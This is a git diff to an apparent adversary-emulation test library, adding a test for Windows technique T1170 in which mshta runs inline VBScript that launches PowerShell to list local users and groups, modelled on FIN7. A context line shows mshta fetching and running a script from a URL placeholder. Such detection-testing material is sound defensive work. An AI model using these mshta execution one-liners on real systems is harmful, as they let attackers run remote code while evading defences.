diff --git a/atomics/T1170/T1170.yaml b/atomics/T1170/T1170.yaml
index e88984fb..2b5dbc34 100644
--- a/atomics/T1170/T1170.yaml
+++ b/atomics/T1170/T1170.yaml
@@ -18,4 +18,20 @@ atomic_tests:
     elevation_required: false
     command: |
       mshta.exe javascript:a=(GetObject('script:#{file_url}')).Exec();close();
-      
+
+- name: Mshta executes VBScript to execute malicious code
+  description: |
+    Run a local VB script to run local user enumeration powershell command
+
+    This attempts to emulate what FIN7 does with this technique which is using mshta.exe to execute VBScript to execute malicious code on victim systems.
+  supported_platforms:
+    - windows
+  input_arguments:
+    atomics_path:
+      description: path to atomics folder
+      type: path
+      default: ..\..\atomics
+  executor:
+    name: command_prompt
+    command: |
+      mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -noexit -file #{atomics_path}\T1170\src\powershell.ps1"":close")
diff --git a/atomics/T1170/src/powershell.ps1 b/atomics/T1170/src/powershell.ps1
new file mode 100644
index 00000000..701fb709
--- /dev/null
+++ b/atomics/T1170/src/powershell.ps1
@@ -0,0 +1,2 @@
+Get-LocalUser
+Get-LocalGroup
\ No newline at end of file